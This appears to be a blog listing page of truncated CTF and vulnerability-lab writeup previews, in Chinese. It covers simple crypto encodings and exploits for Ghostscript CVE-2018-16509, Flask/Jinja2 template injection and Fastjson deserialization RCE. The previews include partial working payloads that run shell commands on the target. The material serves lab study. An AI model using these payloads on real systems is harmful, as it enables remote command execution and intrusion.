
BMZCTF
BMZclub平台的题目writeup
「已注销」
这个作者很懒,什么都没留下…
展开
-
【bmzctf-crypto】--writeup
4进制4进制转16进制,再转字符串。2018 AFCTF Morse摩斯电码解密得16进制。16进制转字符串得flag。2018 HEBTUCTF 社会主义接班人自由爱国自由平等自由文明平等自由平等平等自由和谐平等自由自由公正法治诚信民主公正平等公正友善自由法治公正公正友善敬业法治公正公正自由公正民主法治和谐公正公正公正诚信富强公正公正法治公正公正友善法治法治文明公正公正公正友善法治法治和谐公正自由公正平等公正诚信和谐法治爱国公正友善自由法治诚信和谐这是社会主原创 2022-01-06 16:39:23 · 1978 阅读 · 0 评论 -
【漏洞靶场】--GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
环境exp把如下代码保存为一个png文件。%!PSuserdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestoremark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops上传,执行l原创 2022-01-06 16:04:04 · 2288 阅读 · 0 评论 -
【漏洞靶场】--Flask(Jinja2) 服务端模板注入漏洞
漏洞环境SSTI访问?name=1,触发ssti漏洞。payload{%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__c原创 2022-01-06 16:01:22 · 3235 阅读 · 0 评论 -
【漏洞靶场】--Fastjson 1.2.47 远程命令执行漏洞
漏洞环境exp准备将如下Java代码编译成class字节码。import java.io.BufferedReader;import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRun原创 2022-01-06 15:57:57 · 393 阅读 · 0 评论 -
【漏洞靶场】--fastjson 1.2.24 反序列化导致任意命令执行漏洞
漏洞环境以上是fastjson搭建好的默认页面。exp准备准备好如下Java代码。import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {Process p = Runtime.getRuntime().exec(new String[]{"/bin/ba原创 2022-01-06 15:14:47 · 576 阅读 · 0 评论